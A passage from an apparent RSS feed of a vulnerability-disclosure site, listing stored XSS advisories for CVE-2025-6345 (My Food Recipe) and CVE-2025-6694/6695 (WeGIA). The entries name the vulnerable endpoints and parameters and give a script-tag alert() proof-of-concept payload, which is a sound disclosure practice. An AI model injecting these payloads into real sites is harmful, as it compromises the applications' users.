    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 27 Jun 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-6345</title>
        <link>https://www.cvehunters.com/p/cve-2025-6345/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-6345/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-6345-cross-site-scripting-xss-stored-endpoint-add-recipephp-parameter-recipe-name&amp;#34;&amp;gt;CVE-2025-6345: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;add-recipe.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;Recipe Name&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-6345&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-6345&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;add-recipe.php&amp;lt;/code&amp;gt; endpoint of the My Food Recipe application by Source Codester. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Recipe Name&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-6345-cross-site-scripting-xss-stored-endpoint-add-recipephp-parameter-recipe-name&amp;#34;&amp;gt;CVE-2025-6345: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;add-recipe.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;Recipe Name&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-6345&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-6345&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;add-recipe.php&amp;lt;/code&amp;gt; endpoint of the My Food Recipe application by Source Codester. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Recipe Name&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/endpoint/add-recipe.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;Recipe Name&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;Recipe Name&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;PoC VulDB My Food Recipe&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6345/image.png&amp;#34;
	width=&amp;#34;1885&amp;#34;
	height=&amp;#34;979&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6345/image_hu_2d96538d4258e3ef.png 480w, /p/cve-2025-6345/image_hu_69d65a36c5d34271.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;192&amp;#34;
		data-flex-basis=&amp;#34;462px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6345/image-1.png&amp;#34;
	width=&amp;#34;1887&amp;#34;
	height=&amp;#34;978&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6345/image-1_hu_367086433527965a.png 480w, /p/cve-2025-6345/image-1_hu_97a43c355f94af1c.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;192&amp;#34;
		data-flex-basis=&amp;#34;463px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;video-poc&amp;#34;&amp;gt;Video PoC:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://youtu.be/HLt4Ezuzxaw&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://youtu.be/HLt4Ezuzxaw&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6345.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6345.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/raul50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Raul Pazemécxas&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 26 Jun 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-6694</title>
        <link>https://www.cvehunters.com/p/cve-2025-6694/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-6694/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-6694-cross-site-scripting-xss-stored-endpoint-adicionar_unidadephp-parameter-unidade&amp;#34;&amp;gt;CVE-2025-6694: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;adicionar_unidade.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;Unidade&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-6694&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-6694&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;adicionar_unidade.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Unidade&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/html/matPat/adicionar_unidade.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-6694-cross-site-scripting-xss-stored-endpoint-adicionar_unidadephp-parameter-unidade&amp;#34;&amp;gt;CVE-2025-6694: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;adicionar_unidade.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;Unidade&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-6694&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-6694&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;adicionar_unidade.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Unidade&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/html/matPat/adicionar_unidade.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;Unidade&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;Unidade&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;Poc VulDB&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt; &amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6694/image.png&amp;#34;
	width=&amp;#34;1896&amp;#34;
	height=&amp;#34;993&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6694/image_hu_aa98354b3826b69.png 480w, /p/cve-2025-6694/image_hu_f42a65e996076c92.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;190&amp;#34;
		data-flex-basis=&amp;#34;458px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6694/image-1.png&amp;#34;
	width=&amp;#34;1879&amp;#34;
	height=&amp;#34;990&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6694/image-1_hu_ee83094dec5adefe.png 480w, /p/cve-2025-6694/image-1_hu_384fcc464a1d2a6.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;189&amp;#34;
		data-flex-basis=&amp;#34;455px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6694/image-2.png&amp;#34;
	width=&amp;#34;1884&amp;#34;
	height=&amp;#34;976&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6694/image-2_hu_a237a910db38d115.png 480w, /p/cve-2025-6694/image-2_hu_afe9be25709c469f.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;193&amp;#34;
		data-flex-basis=&amp;#34;463px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-6694/image-3.png&amp;#34;
	width=&amp;#34;1890&amp;#34;
	height=&amp;#34;988&amp;#34;
	srcset=&amp;#34;/p/cve-2025-6694/image-3_hu_e1aad1c294d8b48e.png 480w, /p/cve-2025-6694/image-3_hu_547e87c56180f7a2.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;191&amp;#34;
		data-flex-basis=&amp;#34;459px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;video-poc&amp;#34;&amp;gt;Video PoC:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.youtube.com/watch?v=X7DJmOtNqxU&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.youtube.com/watch?v=X7DJmOtNqxU&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6694.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-6694.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/raul50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Raul Pazemécxas&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 26 Jun 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-6695</title>
        <link>https://www.cvehunters.com/p/cve-2025-6695/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-6695/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-6695-cross-site-scripting-xss-stored-endpoint-adicionar_categoriaphp-parameter-categoria&amp;#34;&amp;gt;CVE-2025-6695: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;adicionar_categoria.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;Categoria&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-6695&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-6695&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;adicionar_categoria.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Categoria&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
